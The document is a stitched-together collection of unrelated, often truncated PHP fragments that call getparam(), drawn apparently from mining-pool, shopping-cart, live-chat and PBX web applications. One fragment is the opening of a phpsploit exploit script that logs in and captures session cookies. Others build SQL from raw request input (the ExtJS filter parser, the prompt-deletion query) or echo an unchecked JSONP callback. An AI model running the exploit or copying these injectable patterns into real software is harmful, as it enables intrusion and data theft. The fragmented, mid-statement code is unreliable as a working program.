public function actionIndex() { if (isset($_COOKIE['mainbtc'])) { return; } if (!LimitRequest('explorer')) { return; } $id = getiparam('id'); $coin = getdbo('db_coins', $id); $height = getparam('height'); if ($coin && intval($height) > 0) { $remote = new Bitcoin($coin->rpcuser, $coin->rpcpasswd, $coin->rpchost, $coin->rpcport); $hash = $remote->getblockhash(intval($height)); } else { $hash = getparam('hash'); } $txid = getparam('txid'); if ($coin && !empty($txid) && ctype_alnum($txid)) { $remote = new Bitcoin($coin->rpcuser, $coin->rpcpasswd, $coin->rpchost, $coin->rpcport); $tx = $remote->getrawtransaction($txid, 1); $hash = $tx['blockhash']; } if ($coin && !empty($hash) && ctype_alnum($hash)) { $this->render('block', array('coin' => $coin, 'hash' => substr($hash, 0, 64))); } else { if ($coin) { $this->render('coin', array('coin' => $coin)); } else { $this->render('index'); } } }
function go() { $a = getparam('a', true); $f = substr($a, 0, 1); if ($f != '1' and $f != '3') { return; } if (preg_match('/^[a-zA-Z0-9]{24,}[\\._]?[a-zA-Z0-9\\._]*$/', $a) === false) { return; } $sta = "../pool/workers/{$a}"; if (file_exists($sta)) { echo file_get_contents($sta); } }
function wrapResponse($response, $doc) { if (isset($response)) { if (isset($response->error)) { $data = '{"error":"' . $response->error . '"}'; } else { $data = '{"success":true, "obj":' . json_encode($doc) . '}'; } } else { $data = json_encode($doc); } $cb = getparam('callback'); if ($cb) { echo $cb . '(' . $data . ')'; } else { echo $data; } }
function douserset($data, $user) { $err = ''; $chg = getparam('Change', false); $api = false; switch ($chg) { case 'API Key': $ans = getAtts($user, 'KAPIKey.str,KAPIKey.dateexp'); if ($ans['STATUS'] != 'ok') { dbdown(); } // Should be no other reason? if (isset($ans['KAPIKey.dateexp']) && $ans['KAPIKey.dateexp'] == 'N') { $err = 'You can only change it once a day'; if (isset($ans['KAPIKey.str'])) { $api = $ans['KAPIKey.str']; } } else { $ran = $ans['STAMP'] . $user . rand(100000000, 999999999); $api = hash('md4', $ran); $day = 60 * 60 * 24; $ans = setAtts($user, array('ua_KAPIKey.str' => $api, 'ua_KAPIKey.date' => "now+{$day}")); if ($ans['STATUS'] != 'ok') { syserror(); } } break; } if ($api === false) { $ans = getAtts($user, 'KAPIKey.str'); if ($ans['STATUS'] != 'ok') { dbdown(); } // Should be no other reason? if (isset($ans['KAPIKey.str'])) { $api = $ans['KAPIKey.str']; } } $pg = uset($data, $user, $api, $err); return $pg; }
function doworkmgt($data, $user) { $err = ''; $S = getparam('S', false); $chk = getparam('seven', false); if ($S == 'Update') { $settings = array(); if ($chk == 'on') { $settings['oldworkers'] = '7'; } else { $settings['oldworkers'] = '0'; } $ans = workerSet($user, $settings); if ($ans['STATUS'] != 'ok') { $err = $ans['ERROR']; } } else { $OK = getparam('OK', false); $count = getparam('rows', false); if ($OK == 'OK' && !nuem($count)) { if ($count > 0 && $count < 9999) { $settings = array(); for ($i = 0; $i < $count; $i++) { $wn = urldecode(getparam('workername:' . $i, false)); $md = getparam('difficultydefault:' . $i, false); if (!nuem($wn) && !nuem($md)) { $settings['workername:' . $i] = $wn; $settings['difficultydefault:' . $i] = $md; } } $ans = workerSet($user, $settings); if ($ans['STATUS'] != 'ok') { $err = $ans['ERROR']; } } } } $pg = workmgtuser($data, $user, $err); return $pg; }
public function actionSellto() { if (!$this->admin) { return; } $market = getdbo('db_markets', getiparam('id')); $coin = getdbo('db_coins', $market->coinid); $amount = getparam('amount'); $remote = new Bitcoin($coin->rpcuser, $coin->rpcpasswd, $coin->rpchost, $coin->rpcport); $info = $remote->getinfo(); if (!$info || !$info['balance']) { return false; } $deposit_info = $remote->validateaddress($market->deposit_address); if (!$deposit_info || !isset($deposit_info['isvalid']) || !$deposit_info['isvalid']) { user()->setFlash('error', "invalid address {$coin->name}, {$market->deposit_address}"); $this->redirect(array('site/coin', 'id' => $coin->id)); } $amount = min($amount, $info['balance'] - $info['paytxfee']); // $amount = max($amount, $info['balance'] - $info['paytxfee']); $amount = round($amount, 8); debuglog("selling ({$market->deposit_address}, {$amount})"); $tx = $remote->sendtoaddress($market->deposit_address, $amount); if (!$tx) { user()->setFlash('error', $remote->error); $this->redirect(array('site/coin', 'id' => $coin->id)); } $exchange = new db_exchange(); $exchange->market = $market->name; $exchange->coinid = $coin->id; $exchange->send_time = time(); $exchange->quantity = $amount; $exchange->price_estimate = $coin->price; $exchange->status = 'waiting'; $exchange->tx = $tx; $exchange->save(); $this->redirect(array('site/coin', 'id' => $coin->id)); }
function check() { $dmenu = def_menu(); $menu = array('Home' => array('Home' => ''), 'Account' => array('Rewards' => 'mpayouts', 'Payments' => 'payments', 'Settings' => 'settings', 'User Settings' => 'userset', '2FA Settings' => '2fa'), 'Workers' => array('Shifts' => 'shifts', 'Shift Graph' => 'usperf', 'Workers' => 'workers', 'Management' => 'workmgt'), 'Pool' => array('Stats' => 'stats', 'Blocks' => 'blocks', 'Graph' => 'psperf', 'Acclaim' => 'userinfo', 'Luck' => 'luck'), 'Admin' => NULL, 'gap' => array('API' => 'api', 'PBlocks' => 'pblocks'), 'Help' => array('Payouts' => 'payout')); tryLogInOut(); $who = loggedIn(); if ($who === false) { $p = getparam('k', true); if ($p == 'reset') { showPage(NULL, 'reset', $dmenu, '', $who); } else { if (requestLoginRegReset() == true) { showPage(NULL, 'reg', $dmenu, '', $who); } else { $p = getparam('k', true); process($p, $who, $dmenu); } } } else { $p = getparam('k', true); process($p, $who, $menu); } }
voice: 972.669.0041 fax: 972.669.8972 */ header("Expires: " . GMDate("D, d M Y H:i:s") . " GMT"); require_once '../../bit_setup_inc.php'; $gBitSystem->verifyPermission('bit_p_bitcart_admin'); require_once BITCART_PKG_PATH . 'functions.php'; // ========== start of variable loading ========== // load passed variables and cookie variables // int or double cast the numbers, no exceptions $zoneid = (int) getparam('zoneid'); $langid = (int) getparam('langid'); $show = (int) getparam('show'); $srch = (int) getparam('srch'); $act = getparam('act'); $oldzid = (int) getparam('oldzid'); // ========== end of variable loading ========== require './admin.php'; require './header.php'; $droot = "BITCART_PKG_PATH"; if ($zoneid == 0) { ?> Please click the "Back" button on your browser and select a default zone. Thank you. <?php exit; } $fcm = new FC_SQL(); $fcm->Auto_commit = 0; $fcm->query("select count(*) as cnt from master"); $fcm->next_record();
* not to allow others to use your version of this file under the terms of the * EPL, indicate your decision by deleting the provisions above and replace them * with the notice and other provisions required by the GPL. * * Contributors: * Evgeny Gryaznov - initial API and implementation */ require_once '../libs/common.php'; require_once '../libs/operator.php'; require_once '../libs/settings.php'; require_once '../libs/notify.php'; $errors = array(); $page = array('version' => $version); $loginoremail = ""; if (isset($_POST['loginoremail'])) { $loginoremail = getparam("loginoremail"); $torestore = is_valid_email($loginoremail) ? operator_by_email($loginoremail) : operator_by_login($loginoremail); if (!$torestore) { $errors[] = getlocal("no_such_operator"); } $email = $torestore['vcemail']; if (count($errors) == 0 && !is_valid_email($email)) { $errors[] = "Operator hasn't set his e-mail"; } if (count($errors) == 0) { $token = md5(time() + microtime() . rand(0, 99999999)); $link = connect(); $query = "update {$mysqlprefix}chatoperator set dtmrestore = CURRENT_TIMESTAMP, vcrestoretoken = '{$token}' where operatorid = " . $torestore['operatorid']; perform_query($query, $link); $href = get_app_location(true, false) . "/operator/resetpwd.php?id=" . $torestore['operatorid'] . "&token={$token}"; webim_mail($email, $email, getstring("restore.mailsubj"), getstring2("restore.mailtext", array(get_operator_name($torestore), $href)), $link);
// load passed variables and cookie variables // int or double cast the numbers, no exceptions // if $zid or $lid are found, they should be changed // to $zoneid or $langid, respectively. Once all // maint files are done, $zid and $lid can probably // be eliminated. $zoneid = (int) getparam('zoneid'); $langid = (int) getparam('langid'); $act = getparam('act'); $sku = getparam('sku'); $nsy = (int) getparam('nsy'); $nsm = (int) getparam('nsm'); $nsd = (int) getparam('nsd'); $ney = (int) getparam('ney'); $nem = (int) getparam('nem'); $ned = (int) getparam('ned'); // ========== end of variable loading ========== if (strlen($sku) > 20) { ?> The SKU description field exceeds 20 characters. <p>Please click the "Back" button on your browser and correct the errors. Thank you. <?php exit; } if ($act == "insert" || $act == "update") { if ($nsm != "" && $nsd != "" && $nsy != "" && $nem != "" && $ned != "" && $ney != "") { $sdate = mktime(0, 0, 0, $nsm, $nsd, $nsy); $ndate = mktime(0, 0, 0, $nem, $ned, $ney); } else { $sdate = 0;
function dopplns($data, $user) { global $send_sep; $pg = '<h1>CKPool</h1>'; $blk = getparam('blk', true); if (nuem($blk)) { $tx = ''; # so can make a link $blkuse = getparam('blkuse', true); if (nuem($blkuse)) { $blkuse = ''; } else { $tx = 'y'; } $pg = '<br>' . makeForm('pplns') . "\nBlock: <input type=text name=blk size=10 value='{$blkuse}'>\n Tx: <input type=text name=tx size=1 value='{$tx}'>\n Dust (Satoshi): <input type=text name=dust size=5 value='10000'>\n Fee (BTC): <input type=text name=fee size=5 value='0.0'>\n <input type=submit name=Calc value=Calc>\n</form>"; } else { $tx = getparam('tx', true); if (nuem($tx) || substr($tx, 0, 1) != 'y') { $dotx = false; } else { $dotx = true; } $flds = array('height' => $blk, 'allow_aged' => 'Y'); if ($blk > 334106) { $flds['diff_times'] = '5'; } $msg = msgEncode('pplns', 'pplns', $flds, $user); $rep = sendsockreply('pplns', $msg, 4); if ($rep == false) { $ans = array(); } else { $ans = repDecode($rep); } if ($ans['ERROR'] != null) { return '<font color=red size=+1><br>' . $ans['STATUS'] . ': ' . $ans['ERROR'] . '</font>'; } if (!isset($ans['pplns_last'])) { return '<font color=red size=+1><br>Partial data returned</font>'; } $reward_sat = $ans['block_reward']; $miner_sat = round($reward_sat * 0.991); $ans['miner_sat'] = $miner_sat; $data = array('Block' => 'block', 'Block Status' => 'block_status', 'Block Hash' => 'block_hash', 'Block Reward (Satoshis)' => 'block_reward', 'Miner Reward (Satoshis)' => 'miner_sat', 'PPLNS Wanted' => '.diff_want', 'PPLNS Used' => '.diffacc_total', 'Elapsed Seconds' => ',pplns_elapsed', 'Users' => 'rows', 'Oldest Workinfoid' => 'begin_workinfoid', 'Oldest Time' => 'begin_stamp', 'Oldest Epoch' => 'begin_epoch', 'Block Workinfoid' => 'block_workinfoid', 'Block Time' => 'block_stamp', 'Block Epoch' => 'block_epoch', 'Newest Workinfoid' => 'end_workinfoid', 'Newest Share Time' => 'end_stamp', 'Newest Share Epoch' => 'end_epoch', 'Network Difficulty' => 'block_ndiff', 'PPLNS Factor' => 'diff_times', 'PPLNS Added' => 'diff_add', 'Accepted Share Count' => ',acc_share_count', 'Total Share Count' => ',total_share_count', 'ShareSummary Count' => ',ss_count', 'WorkMarkers Count' => ',wm_count', 'MarkerSummary Count' => ',ms_count'); $pg = '<br><a href=https://blockchain.info/block-height/'; $pg .= $ans['block'] . '>Blockchain ' . $ans['block'] . "</a><br>\n"; if (strlen($ans['marks_status']) > 0) { $pg .= '<br><span class=err>'; $msg = $ans['marks_status']; $pg .= str_replace(' ', ' ', $msg) . "</span><br>\n"; } if (strlen($ans['block_extra']) > 0) { $pg .= '<br><span class=err>'; $msg = $ans['block_status'] . ' - ' . $ans['block_extra']; $pg .= str_replace(' ', ' ', $msg) . "</span><br>\n"; } if (strlen($ans['share_status']) > 0) { $pg .= '<br><span class=err>'; $msg = $ans['share_status'] . " - Can't be paid out yet"; $pg .= str_replace(' ', ' ', $msg) . "</span><br>\n"; } $pg .= "<br><table cellpadding=0 cellspacing=0 border=0>\n"; $pg .= '<tr class=title>'; $pg .= '<td class=dl>Name</td>'; $pg .= '<td class=dr>Value</td>'; $pg .= "</tr>\n"; $i = 0; foreach ($data as $dsp => $name) { if ($i++ % 2 == 0) { $row = 'even'; } else { $row = 'odd'; } $pg .= "<tr class={$row}>"; $pg .= "<td class=dl>{$dsp}</td>"; switch ($name[0]) { case ',': case '.': $nm = substr($name, 1); $fmt = fmtdata($name[0], $ans[$nm]); break; default: $fmt = $ans[$name]; break; } $pg .= "<td class=dr>{$fmt}</td>"; $pg .= "</tr>\n"; } $pg .= "</table><br><table cellpadding=0 cellspacing=0 border=0>\n"; $pg .= '<tr class=title>'; $pg .= '<td class=dl>User</td>'; $pg .= '<td class=dr>Diff Accepted</td>'; $pg .= '<td class=dr>%</td>'; $pg .= '<td class=dr>Avg Hashrate</td>'; $pg .= '<td class=dr>BTC -0.9%</td>'; $pg .= '<td class=dr>Address</td>'; $pg .= "</tr>\n"; $diffacc_total = $ans['diffacc_total']; if ($diffacc_total == 0) { $diffacc_total = pow(10, 15); } $elapsed = $ans['pplns_elapsed']; $count = $ans['rows']; $tot_pay = 0; for ($i = 0; $i < $count; $i++) { $diffacc_user = $ans['diffacc_user:'******'%'; $avg_hash = number_format($diffacc_user / $elapsed * pow(2, 32), 0); $pay_sat = floor($miner_sat * $diffacc_user / $diffacc_total); $payaddress = $ans['payaddress:' . $i]; if ($i % 2 == 0) { $row = 'even'; } else { $row = 'odd'; } $pg .= "<tr class={$row}>"; $pg .= '<td class=dl>' . $ans['user:'******'</td>'; $pg .= "<td class=dr>{$diffacc_user}</td>"; $pg .= "<td class=dr>{$diffacc_percent}</td>"; $pg .= "<td class=dr>{$avg_hash}</td>"; $pg .= '<td class=dr>' . btcfmt($pay_sat) . '</td>'; $pg .= "<td class=dr>{$payaddress}</td>"; $pg .= "</tr>\n"; $tot_pay += $pay_sat; } if ($i % 2 == 0) { $row = 'even'; } else { $row = 'odd'; } $pg .= "<tr class={$row}>"; $pg .= '<td class=dl colspan=3></td>'; $pg .= '<td class=dr></td>'; $pg .= '<td class=dr>' . btcfmt($tot_pay) . '</td>'; $pg .= '<td class=dr></td>'; $pg .= "</tr>\n"; $pg .= "</table>\n"; if ($dotx === true) { $pg .= calctx($ans, $count, $miner_sat, $diffacc_total); } } return $pg; }
N. Michael Brennen FishNet(R), Inc. 850 S. Greenville, Suite 102 Richardson, TX 75081 http://www.fni.com/ mbrennen@fni.com voice: 972.669.0041 fax: 972.669.8972 */ header("Last-Modified: " . gmdate("D, d M Y H:i:s", time()) . " GMT"); require_once BITCART_PKG_PATH . 'functions.php'; // ========== start of variable loading ========== // load passed variables and cookie variables // int or double cast the numbers, no exceptions $zoneid = (int) getparam('zoneid'); $langid = (int) getparam('langid'); // ========== end of variable loading ========== require './admin.php'; require './header.php'; $fcl = new FC_SQL(); $fcp = new FC_SQL(); if (!$zoneid || !$langid) { ?> Please click Back and select a zone and/or language. Thank you. <?php exit; } ?> <h2 align=center>Keyword Search Statistics</h2> <hr>
* Free Software Foundation, версии 3. * В случае отсутствия файла «License» (идущего вместе с исходными кодами программного обеспечения) * описывающего условия GNU General Public License версии 3, можно посетить официальный сайт * http://www.gnu.org/licenses/ , где опубликованы условия GNU General Public License * различных версий (в том числе и версии 3). * | ENG | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * "Komunikator" is a web interface for IP-PBX "YATE" configuration and management * Copyright (C) 2012-2013, "Telephonnyie sistemy" Ltd. * THIS FILE is an integral part of the project "Komunikator" * "Komunikator" project site: http://komunikator.ru/ * "Komunikator" technical support e-mail: support@komunikator.ru * The project "Komunikator" are used: * the source code of "YATE" project, http://yate.null.ro/pmwiki/ * the source code of "FREESENTRAL" project, http://www.freesentral.com/ * "Sencha Ext JS" project libraries, http://www.sencha.com/products/extjs * "Komunikator" web application is a free/libre and open-source software. Therefore it grants user rights * for distribution and (or) modification (including other rights) of this programming solution according * to GNU General Public License terms and conditions published by Free Software Foundation in version 3. * In case the file "License" that describes GNU General Public License terms and conditions, * version 3, is missing (initially goes with software source code), you can visit the official site * http://www.gnu.org/licenses/ and find terms specified in appropriate GNU General Public License * version (version 3 as well). * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */ need_user(); $status = getparam("status"); $action = 'destroy_prompts'; $rows = array(); $rows[] = array('id' => "(SELECT prompt_id FROM (SELECT * from prompts) a where a.status = '{$status}')"); $id_name = 'prompt_id'; require_once "destroy.php";
public function actionWithdraw() { $fees = 0.0001; $deposit = user()->getState('yaamp-deposit'); if (!$deposit) { $this->render('login'); return; } $renter = getrenterparam($deposit); if (!$renter) { $this->render('login'); return; } $amount = getparam('withdraw_amount'); $address = getparam('withdraw_address'); $amount = floatval(bitcoinvaluetoa(min($amount, $renter->balance - $fees))); if ($amount < 0.001) { user()->setFlash('error', 'Minimum withdraw is 0.001'); $this->redirect("/renting"); return; } $coin = getdbosql('db_coins', "symbol='BTC'"); if (!$coin) { return; } $remote = new Bitcoin($coin->rpcuser, $coin->rpcpasswd, $coin->rpchost, $coin->rpcport); $res = $remote->validateaddress($address); if (!$res || !isset($res['isvalid']) || !$res['isvalid']) { user()->setFlash('error', 'Invalid address'); $this->redirect("/renting"); return; } $rentertx = new db_rentertxs(); $rentertx->renterid = $renter->id; $rentertx->time = time(); $rentertx->amount = $amount; $rentertx->type = 'withdraw'; $rentertx->address = $address; $rentertx->tx = 'scheduled'; $rentertx->save(); debuglog("withdraw scheduled {$renter->id} {$renter->address}, {$amount} to {$address}"); user()->setFlash('message', "withdraw scheduled"); $this->redirect("/renting"); }
* See the License for the specific language governing permissions and * limitations under the License. */ require_once 'libs/common.php'; require_once 'libs/chat.php'; require_once 'libs/expand.php'; require_once 'libs/notify.php'; $errors = array(); $page = array(); $token = verifyparam("token", "/^\\d{1,8}\$/"); $threadid = verifyparam("thread", "/^\\d{1,8}\$/"); $thread = thread_by_id($threadid); if (!$thread || !isset($thread['ltoken']) || $token != $thread['ltoken']) { die("wrong thread"); } $email = getparam('email'); $page['email'] = $email; if (!$email) { $errors[] = no_field("form.field.email"); } else { if (!is_valid_email($email)) { $errors[] = wrong_field("form.field.email"); } } if (count($errors) > 0) { $page['formemail'] = $email; $page['ct.chatThreadId'] = $thread['threadid']; $page['ct.token'] = $thread['ltoken']; $page['level'] = ""; setup_logo(); expand("styles", getchatstyle(), "mail.tpl");
<?php $percent = 16; $user = getuserparam(getparam('address')); if (!$user) { return; } $algo = getparam('algo'); if (empty($algo)) { $algo = user()->getState('yaamp-algo'); } $target = yaamp_hashrate_constant($algo); $step = 15 * 60; $t = time() - 24 * 60 * 60; $stats = getdbolist('db_hashuser', "time>{$t} and algo=:algo and userid={$user->id} order by time", array(':algo' => $algo)); $averages = array(); echo '[['; for ($i = $t + $step, $j = 0; $i < time(); $i += $step) { if ($i != $t + $step) { echo ','; } $m = 0; if ($i + $step >= time()) { $m = round(yaamp_user_rate($user->id, $algo) / 1000000, 3); // debuglog("last $m"); } else { if (isset($stats[$j]) && $i > $stats[$j]->time) { $m = round($stats[$j]->hashrate / 1000000, 3); $j++; } }
require './functions.php'; // ========== start of variable loading ========== // load passed variables and cookie variables // int or double cast the numbers, no exceptions // custid cookie is mime encoded, don't escape $CookieCustID = getcookie("Cookie{$instid}CustID"); $CookieCart = getcookie("Cookie{$instid}Cart"); $cartid = getparam('cartid'); $key1 = getparam('key1'); $psku = getparam('psku'); $zid = (int) getparam('zid'); $lid = (int) getparam('lid'); $cat = (int) getparam('cat'); $nlst = (int) getparam('nlst'); $olst = (int) getparam('olst'); $olimit = (int) getparam('olimit'); // ========== end of variable loading ========== require './public.php'; require './flags.php'; require './cartid.php'; require './languages.php'; $webid = (int) $webid; $scat = (int) $scat; $fcz = new FC_SQL(); $fcz->query("select zonecurrsym,usescat,zflag1 from zone " . "where zoneid={$zid}"); if ($fcz->next_record()) { $csym = stripslashes($fcz->f("zonecurrsym")); $csym = trim($csym); $zscat = (int) $fcz->f("usescat"); $zflag1 = (int) $fcz->f("zflag1"); } else {
if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { exit("\n-{$param} parameter required"); } else { return; } } $url = getparam("url", 1); $login = getparam("login", 1); $pass = getparam("pass", 1); $email = getparam("email", 1); $file = getparam("file", 1); $id = getparam("id"); $source = @file_get_contents($file); if (strlen($source) < 2) { exit("{$file} don't exist.\n"); } $xpl = new phpsploit(); $s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}"); //Cookies if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) { $xpl->addcookie("PHPSESSID", $phpsessid[1]); $xpl->addcookie("sql_pseudo", $login); $xpl->addcookie("sql_pass", md5($pass)); $xpl->addcookie("auto", "off"); print "[*] PHPSESSID : {$phpsessid['1']}\n"; } else { exit("[*] Can't log in\n");
<?php function WriteBoxHeader($title) { echo "<div class='main-left-box'>"; echo "<div class='main-left-title'>{$title}</div>"; echo "<div class='main-left-inner'>"; } $mining = getdbosql('db_mining'); $defaultalgo = user()->getState('yaamp-algo'); $show_details = getparam('showdetails'); $user = getuserparam(getparam('address')); if (!$user) { return; } WriteBoxHeader("Wallet: {$user->username}"); $refcoin = getdbo('db_coins', $user->coinid); if (!$refcoin) { if ($user->coinid != null) { echo "<div style='color: red; padding: 10px; '>This wallet address is not valid. \r\n\t\t\tYou will not receive payments using this address.</div>"; } $refcoin = getdbosql('db_coins', "symbol='BTC'"); } echo "<table class='dataGrid2'>"; echo "<thead>"; echo "<tr>"; echo "<th></th>"; echo "<th>Name</th>"; echo "<th align=right>Immature</th>"; echo "<th align=right>Confirmed</th>"; echo "<th align=right>Total</th>";
function parseExtJSFilters() { if (getparam('filter') == null) { // No filter passed in return false; } $filters = json_decode(getparam('filter')); // Decode the filter if ($filters == null) { // If we couldn't decode the filter return false; } $whereClauses = array(); // Stores whereClauses foreach ($filters as $filter) { switch ($filter->type) { case 'boolean': $filter->value = $filter->value === true ? '1' : '0'; // Convert value for DB $whereClauses[] = "{$filter->field} = {$filter->value}"; break; case 'date': //$filter->value = "'$filter->value'"; // Enclose data in quotes $filter->value = strtotime($filter->value); // Enclose data in quotes // Enclose data in quotes case 'numeric': switch ($filter->comparison) { case 'lt': // Less Than $whereClauses[] = "{$filter->field} < {$filter->value}"; break; case 'gt': // Greather Than $whereClauses[] = "{$filter->field} > {$filter->value}"; break; case 'eq': // Equal To if ($filter->type == 'date') { $whereClauses[] = "{$filter->field} < {$filter->value}+60*60*24"; $whereClauses[] = "{$filter->field} > {$filter->value}"; } else { $whereClauses[] = "{$filter->field} = {$filter->value}"; } break; } break; case 'list': $listItems = array(); if (!count($filter->value)) { break; } foreach ($filter->value as $value) { $listItems[] = "'{$value}'"; } $whereClauses[] = "{$filter->field} IN(" . implode(',', $listItems) . ')'; break; case 'string': default: // Assume string $whereClauses[] = "(\n {$filter->field} LIKE '{$filter->value}%' OR\n {$filter->field} LIKE '%{$filter->value}' OR \n {$filter->field} LIKE '%{$filter->value}%' OR\n {$filter->field} = '{$filter->value}'\n )"; break; } } if (count($whereClauses) > 0) { return implode(' AND ', $whereClauses); } return false; }
if ($stringid) { $message = load_message($stringid); if (!$message) { $errors[] = getlocal("cannededit.no_such"); $stringid = ""; } } else { $message = ""; $page['locale'] = verifyparam("lang", "/^[\\w-]{2,5}\$/", ""); $page['groupid'] = ""; if ($settings['enablegroups'] == '1') { $page['groupid'] = verifyparam("group", "/^\\d{0,10}\$/"); } } if (isset($_POST['message'])) { $message = getparam('message'); if (!$message) { $errors[] = no_field("form.field.message"); } if (count($errors) == 0) { if ($stringid) { save_message($stringid, $message); } else { add_message($page['locale'], $page['groupid'], $message); } $page['saved'] = true; prepare_menu($operator, false); start_html_output(); require '../view/cannededit.php'; exit; }
$page = array('version' => $version, 'showform' => true); $opId = verifyparam("id", "/^\\d{1,9}\$/"); $token = verifyparam("token", "/^[\\dabcdef]+\$/"); $operator = operator_by_id($opId); if (!$operator) { $errors[] = "No such operator"; $page['showform'] = false; } else { if ($token != $operator['vcrestoretoken']) { $errors[] = "Wrong token"; $page['showform'] = false; } } if (count($errors) == 0 && isset($_POST['password'])) { $password = getparam('password'); $passwordConfirm = getparam('passwordConfirm'); if (!$password) { $errors[] = no_field("form.field.password"); } if ($password != $passwordConfirm) { $errors[] = getlocal("my_settings.error.password_match"); } if (count($errors) == 0) { $page['isdone'] = true; $link = connect(); $query = "update {$mysqlprefix}chatoperator set vcpassword = '******', vcrestoretoken = '' where operatorid = " . $opId; perform_query($query, $link); mysql_close($link); start_html_output(); require '../view/resetpwd.php'; exit;
<?php ///////////////////////////////////////////////////////////////////////////////////////////////// $symbol = getparam('symbol'); $coin = null; if ($symbol == 'all') { $users = getdbolist('db_accounts', "balance>.001 order by balance desc"); } else { $coin = getdbosql('db_coins', "symbol=:symbol", array(':symbol' => $symbol)); if (!$coin) { return; } $users = getdbolist('db_accounts', "balance>.001 and coinid={$coin->id} order by balance desc"); } //echo "<br><table class='dataGrid'>"; showTableSorter('maintable'); echo "<thead>"; echo "<tr>"; echo "<th>ID</th>"; echo "<th>Wallet</th>"; echo "<th>Last</th>"; echo "<th align=right>Miners</th>"; echo "<th align=right>Hashrate</th>"; echo "<th align=right>Bad</th>"; echo "<th></th>"; echo "<th align=right>Blocks</th>"; echo "<th align=right>Diff/Paid</th>"; echo "<th align=right>Balance</th>"; echo "<th align=right>Total Paid</th>"; echo "<th></th>"; echo "</tr>";
http://www.fni.com/ mbrennen@fni.com voice: 972.669.0041 fax: 972.669.8972 */ header("Expires: " . GMDate("D, d M Y H:i:s") . " GMT"); require_once '../../bit_setup_inc.php'; $gBitSystem->verifyPermission('bit_p_bitcart_admin'); require_once BITCART_PKG_PATH . 'functions.php'; // ========== start of variable loading ========== // load passed variables and cookie variables // int or double cast the numbers, no exceptions $zoneid = (int) getparam('zoneid'); $langid = (int) getparam('langid'); $show = (int) getparam('show'); $srch = (int) getparam('srch'); // ========== end of variable loading ========== require './admin.php'; require './header.php'; ?> <h2 align=center>Modify The Master Profile</h2> <hr> <p> <center> <table border=0 cellpadding=4 cellspacing=1 bgcolor=#666666 width=650 class="text"> <tr><td align=center bgcolor=#ffffff> <a href="index.php?zoneid=<?php echo $zoneid;
// ========== end of variable loading ========== require './admin.php'; require './header.php'; $fcc = new FC_SQL(); if (!$zoneid || !$langid) { ?> A zone or language ID was not selected. <p>Please click the "Back" button on your browser and select a zone. Thank you. <?php exit; } $i = 0; while ($i < $catcount) { $seq = (int) getparam('catseq' . $i); $cid = (int) getparam('catval' . $i); $fcc->query("update cat set catseq={$seq} " . "where catzid={$zoneid} and catval={$cid}"); $i++; } ?> <a href="index.php?zoneid=<?php echo $zoneid; ?> &langid=<?php echo $langid; ?> " onClick="closehelp();"> Return to Central Maintenance Page</a><br>
// int or double cast the numbers, no exceptions // custid cookie is mime encoded, don't escape $CookieCustID = getcookie("Cookie{$instid}CustID"); $CookieCart = getcookie("Cookie{$instid}Cart"); $cartid = getparam('cartid'); $zid = (int) getparam('zid'); $lid = (int) getparam('lid'); $aid = (int) getparam('aid'); $itot = (int) getparam('itot'); $szid = (int) getparam('szid'); $zflag1 = (int) getparam('zflag1'); $custid = (int) getparam('custid'); $quantity = (int) getparam('quantity'); $ccexp_years = (int) getparam('ccexp_years'); $contrib = (double) getparam('contrib'); $doit = (int) getparam('doit'); // ========== end of variable loading ========== require './public.php'; require './flags.php'; require './cartid.php'; require './languages.php'; $fcclnks = new FC_SQL(); $fcview = new FC_SQL(); $fcal = new FC_SQL(); $fcz = new FC_SQL(); $fcz->query("select zonecurrsym,zflag1 from zone where zoneid={$zid}"); if ($fcz->next_record()) { $csym = stripslashes($fcz->f("zonecurrsym")); $csym = trim($csym); $zflag1 = (int) $fcz->f('zflag1'); } else {
require_once '../libs/operator_settings.php'; $operator = check_login(); csrfchecktoken(); $page = array('opid' => ''); $errors = array(); $opId = ''; loadsettings(); if (isset($_POST['login']) && isset($_POST['password'])) { $opId = verifyparam("opid", "/^(\\d{1,9})?\$/", ""); $login = getparam('login'); $email = getparam('email'); $jabber = getparam('jabber'); $password = getparam('password'); $passwordConfirm = getparam('passwordConfirm'); $localname = getparam('name'); $commonname = getparam('commonname'); $jabbernotify = verifyparam("jabbernotify", "/^on\$/", "") == "on"; if (!$localname) { $errors[] = no_field("form.field.agent_name"); } if (!$commonname) { $errors[] = no_field("form.field.agent_commonname"); } if (!$login) { $errors[] = no_field("form.field.login"); } else { if (!preg_match("/^[\\w_\\.]+\$/", $login)) { $errors[] = getlocal("page_agent.error.wrong_login"); } } if ($email != '' && !is_valid_email($email)) {
* distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ require_once '../libs/common.php'; require_once '../libs/operator.php'; if (check_login(false)) { header("Location: {$mibewroot}/operator/"); exit; } $errors = array(); $page = array('formisRemember' => true, 'version' => $version); if (isset($_POST['login']) && isset($_POST['password'])) { $login = getparam('login'); $password = getparam('password'); $remember = isset($_POST['isRemember']) && $_POST['isRemember'] == "on"; $operator = operator_by_login($login); if ($operator && isset($operator['vcpassword']) && check_password_hash($login, $password, $operator['vcpassword'])) { $target = $password == '' ? "{$mibewroot}/operator/operator.php?op=" . intval($operator['operatorid']) : (isset($_SESSION['backpath']) ? $_SESSION['backpath'] : "{$mibewroot}/operator/index.php"); login_operator($operator, $remember, is_secure_request()); header("Location: {$target}"); exit; } else { $errors[] = getlocal("page_login.error"); $page['formlogin'] = $login; } } else { if (isset($_GET['login'])) { $login = getgetparam('login'); if (preg_match("/^(\\w{1,15})\$/", $login)) {
